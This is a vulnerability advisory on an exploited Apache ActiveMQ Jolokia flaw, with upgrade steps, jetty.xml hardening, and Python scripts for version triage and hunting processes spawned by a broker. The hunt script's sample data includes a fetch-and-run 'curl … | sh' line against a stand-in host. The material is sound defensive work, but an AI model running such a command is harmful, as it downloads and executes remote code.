Apache ActiveMQ RCE CVE-2026-34197 Is Being Actively Exploited — Upgrade to 6.2.3 or 5.19.4 Now
A 13-year-old remote code execution flaw in Apache ActiveMQ Classic has been added to CISA's Known Exploited Vulnerabilities catalog. Threat actors are chaining it with ransomware and cryptominers across exposed brokers worldwide.
A remote code execution vulnerability in Apache ActiveMQ Classic that sat undetected for 13 years has been added to CISA’s Known Exploited Vulnerabilities catalog. CVE-2026-34197 carries a CVSS score of 8.8. Federal agencies have until April 30 to patch. Everyone else should move today.
What the Vulnerability Does
The flaw lives in the Jolokia management API that ActiveMQ serves from its embedded web server, alongside the web console (TCP 8161 by default). An unauthenticated attacker invokes a management operation that makes the broker fetch a remote configuration file and then execute arbitrary OS commands with the broker's privileges. No credentials are needed when the endpoint is reachable over the network, and because the stock configuration listens on all interfaces, many on-premises deployments expose it.
Researchers at Horizon3.ai confirmed that exploitation is trivially reproducible. A working public proof-of-concept has been circulating since early April.
Affected Versions
- Apache ActiveMQ Classic versions before 5.19.4
- Apache ActiveMQ 6.x versions before 6.2.3
If you’re running anything older, assume you are vulnerable.
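One way to triage a fleet against the affected-version list above, as an added example that is not code from the article or the ActiveMQ project: a small Python script that reads the broker version through the same Jolokia endpoint the advisory describes (a GET on the BrokerVersion attribute of the Broker MBean, which is the standard name ActiveMQ registers; the broker name "localhost" is the stock activemq.xml default) and compares it with the fixed releases named above. The Jolokia reply embedded below is constructed so the script runs offline.

```python
"""Version triage for Apache ActiveMQ Classic against CVE-2026-34197.

Added example; not code from the article or the ActiveMQ project.
Fixed versions (5.19.4, 6.2.3) come from the advisory text. The Jolokia read
URL, the MBean name (org.apache.activemq:type=Broker,brokerName=<name>) and
the BrokerVersion attribute are the standard ones ActiveMQ exposes; the
broker name "localhost" is the stock default. SAMPLE_RESPONSE is a
constructed Jolokia reply so the script runs offline.
"""
import base64
import json
import re
import sys
import urllib.request
from typing import Optional, Tuple

# First fixed release on each maintained line (from the advisory).
FIXED = {5: (5, 19, 4), 6: (6, 2, 3)}


def parse_version(version: str) -> Tuple[int, int, int]:
    """'5.18.3' or '6.1.0-SNAPSHOT' -> (5, 18, 3)."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return major, minor, patch


def is_vulnerable(version: str) -> bool:
    """True if the release predates the fix on its line."""
    v = parse_version(version)
    if v[0] < 5:
        return True  # "anything older": assume vulnerable
    fixed = FIXED.get(v[0])
    if fixed is None:
        return False  # a line the advisory does not list (e.g. a later major)
    return v < fixed


def version_from_jolokia(body: str) -> str:
    """Extract the BrokerVersion value from a Jolokia read response envelope."""
    doc = json.loads(body)
    if doc.get("status") != 200:
        raise RuntimeError(f"Jolokia status {doc.get('status')}: {doc.get('error')}")
    return str(doc["value"])


def triage(body: str) -> Tuple[str, bool]:
    version = version_from_jolokia(body)
    return version, is_vulnerable(version)


def probe(base_url: str, broker_name: str = "localhost",
          credentials: Optional[Tuple[str, str]] = None,
          timeout: float = 5.0) -> Tuple[str, bool]:
    """Query a live broker. credentials=None exercises the unauthenticated path."""
    url = (f"{base_url.rstrip('/')}/api/jolokia/read/"
           f"org.apache.activemq:type=Broker,brokerName={broker_name}/BrokerVersion")
    # Stock conf/jolokia-access.xml enables strict origin checking, so send an
    # Origin header that matches the console URL.
    req = urllib.request.Request(url, headers={"Origin": base_url.rstrip("/")})
    if credentials:
        token = base64.b64encode(":".join(credentials).encode()).decode()
        req.add_header("Authorization", f"Basic {token}")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return triage(resp.read().decode("utf-8"))


# Constructed reply, shaped like Jolokia's JSON envelope (not captured from a real broker).
SAMPLE_RESPONSE = json.dumps({
    "request": {"mbean": "org.apache.activemq:brokerName=localhost,type=Broker",
                "attribute": "BrokerVersion", "type": "read"},
    "value": "5.18.3",
    "timestamp": 1712000000,
    "status": 200,
})

if __name__ == "__main__":
    if len(sys.argv) > 1:  # e.g. python triage.py http://broker.example.internal:8161
        version, vuln = probe(sys.argv[1])
    else:
        version, vuln = triage(SAMPLE_RESPONSE)
    print(f"ActiveMQ {version}: {'VULNERABLE, upgrade' if vuln else 'at or past the fixed release'}")
```

Run it with a console URL to probe a live broker; an HTTP 401 from probe() tells you the endpoint at least demands credentials, while a clean answer without credentials confirms the exposure the advisory warns about. The comparison is per line, so 5.19.4 and 6.2.3 are the first releases that return "not vulnerable" on the 5.x and 6.x branches respectively.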
What Attackers Are Doing With It
Multiple threat actor groups began exploiting CVE-2026-34197 in early April. Initial access is typically established within minutes of scanning; observed post-exploitation payloads include ransomware droppers, XMRig cryptocurrency miners, and persistent SSH backdoors. Some campaigns have been tracked to state-aligned infrastructure.
ActiveMQ brokers are common in enterprise Java environments — financial services, logistics, healthcare. Any public-facing broker running a vulnerable version is a high-value target right now.
Patch Instructions
For users on the 5.x branch:
# Upgrade to 5.19.4
# Embedded broker in a Maven project: bump the activemq-broker dependency in pom.xml, here via the versions plugin
mvn versions:use-dep-version -Dincludes=org.apache.activemq:activemq-broker -DdepVersion=5.19.4 -DforceVersion=true
# Standalone broker: install the 5.19.4 distribution and carry over conf/ and data/; a Maven command does not upgrade a standalone install
For users on the 6.x branch: Upgrade to 6.2.3 — the minimum safe release on this line.
If an immediate upgrade is not possible, take the endpoint off the network. Jolokia is served by the broker's embedded Jetty, configured in conf/jetty.xml, not by the <managementContext> element in activemq.xml (which governs the JMX connector). Bind the Jetty listener to 127.0.0.1 or remove the /api web application context from jetty.xml, and block external access to TCP 8161 at the firewall.
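The binding change described above, shown as an added example (not from the article) in the conf/jetty.xml layout that ActiveMQ Classic 5.x ships: the stock bean first, then the hardened one. The file differs between releases, so check the bean against your own jetty.xml before editing.

```xml
<!-- conf/jetty.xml as shipped: the console and /api/jolokia listen on every interface -->
<bean id="jettyPort" class="org.apache.activemq.web.WebConsolePort" init-method="start">
    <property name="host" value="0.0.0.0"/>
    <property name="port" value="8161"/>
</bean>

<!-- hardened: loopback only; operators reach the console through an SSH tunnel or a bastion -->
<bean id="jettyPort" class="org.apache.activemq.web.WebConsolePort" init-method="start">
    <property name="host" value="127.0.0.1"/>
    <property name="port" value="8161"/>
</bean>
```

After restarting the broker, confirm with `ss -ltnp | grep 8161` that the listener is on 127.0.0.1 rather than 0.0.0.0, keep the host firewall rule in place as a second layer, and while you are in conf/ replace the default admin/admin entry in jetty-realm.properties, which protects the same /api/* path.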
Why This Took 13 Years to Surface
A researcher working with Claude AI traced the root cause to a design flaw introduced in 2013 — an improper input validation pathway in the OpenWire protocol’s deserialization logic that was compounded by the Jolokia API’s default permissive configuration. The combination was never flagged in previous audits because neither component appeared dangerous in isolation.
The disclosure and a detailed writeup were published by Help Net Security in early April. CISA added the CVE to the KEV catalog this week as in-the-wild exploitation accelerated.
What to Do Right Now
- Identify all ActiveMQ instances in your environment — including those buried in middleware layers or service meshes.
- Upgrade to 5.19.4 or 6.2.3 immediately.
- If you cannot patch, restrict Jolokia access with firewall rules and a loopback binding, and block outbound connections from the broker host to untrusted destinations so the remote configuration fetch the exploit relies on cannot complete.
- Hunt for indicators of compromise: check for unexpected child processes spawned by the ActiveMQ JVM, for requests to /api/jolokia on port 8161 from unexpected sources, and for outbound connections initiated by the broker host (the exploit has the broker fetch its payload remotely; 8161 is the inbound listener, not an egress port).
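The inventory and process-tree hunt from the list above, as an added example (not code from the article or the ActiveMQ project): a Python script that reads `ps -eo pid,ppid,user,comm,args`, identifies broker JVMs, reads their version from the install path, and reports everything running underneath them. Two heuristics are assumptions rather than facts from the advisory: a broker is a java process whose command line carries the -Dactivemq.home property that bin/activemq sets, and the version is taken from an install directory named apache-activemq-X.Y.Z. The ps snapshot below is constructed for offline use.

```python
"""Hunt for the indicator the advisory names: processes spawned by an
ActiveMQ broker JVM. Added example; not code from the article or the
ActiveMQ project. Input is the text of `ps -eo pid,ppid,user,comm,args`.
Heuristics (assumptions): a broker is a java process with -Dactivemq.home=...
on its command line, and its version is read from an apache-activemq-X.Y.Z
install path. SAMPLE_PS is a constructed snapshot for offline use.
"""
import re
import subprocess
import sys
from collections import defaultdict
from dataclasses import dataclass
from typing import List, Optional, Tuple

PS_ARGS = ["ps", "-eo", "pid,ppid,user,comm,args"]
HOME_RE = re.compile(r"-Dactivemq\.home=(\S+)")
VERSION_RE = re.compile(r"apache-activemq-(\d+\.\d+\.\d+)")


@dataclass
class Proc:
    pid: int
    ppid: int
    user: str
    comm: str
    args: str


def parse_ps(text: str) -> List[Proc]:
    """Parse ps output; the header row and malformed rows are skipped."""
    procs = []
    for line in text.splitlines():
        parts = line.split(None, 4)
        if len(parts) < 5 or not parts[0].isdigit():
            continue
        pid, ppid, user, comm, args = parts
        procs.append(Proc(int(pid), int(ppid), user, comm, args))
    return procs


def find_brokers(procs: List[Proc]) -> List[Proc]:
    return [p for p in procs if p.comm == "java" and HOME_RE.search(p.args)]


def broker_version(broker: Proc) -> Optional[str]:
    m = HOME_RE.search(broker.args)
    v = VERSION_RE.search(m.group(1)) if m else None
    return v.group(1) if v else None


def descendants(procs: List[Proc], root_pid: int) -> List[Proc]:
    """Every process below root_pid, so a java -> sh -> curl chain shows up whole."""
    children = defaultdict(list)
    for p in procs:
        children[p.ppid].append(p)
    out, stack = [], [root_pid]
    while stack:
        for child in children[stack.pop()]:
            out.append(child)
            stack.append(child.pid)
    return out


def hunt(procs: List[Proc]) -> List[Tuple[Proc, Proc]]:
    """(broker, descendant) pairs. A broker JVM normally spawns nothing, so each hit needs explaining."""
    return [(b, d) for b in find_brokers(procs) for d in descendants(procs, b.pid)]


# Constructed snapshot: one broker that has spawned a shell pulling a script from TEST-NET-3.
SAMPLE_PS = """\
    PID    PPID USER     COMMAND         COMMAND
      1       0 root     systemd         /sbin/init
    812       1 activemq java            /usr/lib/jvm/java-17/bin/java -Xms64M -Xmx1G -Dactivemq.classpath=/opt/apache-activemq-5.18.3/conf -Dactivemq.home=/opt/apache-activemq-5.18.3 -Dactivemq.base=/opt/apache-activemq-5.18.3 -jar /opt/apache-activemq-5.18.3/bin/activemq.jar start
   1200       1 root     sshd            /usr/sbin/sshd -D
   4411     812 activemq sh              sh -c curl -s http://203.0.113.10/x.sh | sh
   4412    4411 activemq curl            curl -s http://203.0.113.10/x.sh
   4413    4411 activemq sh              sh
"""


def main() -> None:
    if len(sys.argv) > 1 and sys.argv[1] == "--live":
        text = subprocess.run(PS_ARGS, capture_output=True, text=True, check=True).stdout
    else:
        text = SAMPLE_PS
    procs = parse_ps(text)
    for b in find_brokers(procs):
        print(f"broker pid={b.pid} user={b.user} version={broker_version(b) or 'unknown'}")
    for b, d in hunt(procs):
        print(f"  ALERT broker {b.pid} -> pid={d.pid} ppid={d.ppid} {d.comm}: {d.args}")


if __name__ == "__main__":
    main()
```

Run with `--live` on each host you suspect; the version line doubles as the inventory step, and any ALERT line is a broker JVM with a process tree beneath it, which a healthy broker does not have. Pair it with a snapshot of the broker PID's sockets (`ss -tnp`) to catch the outbound fetch when the spawned process has already exited.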
The patch is straightforward. The exposure window is closing fast — but not fast enough if you’re still running a vulnerable broker facing the internet.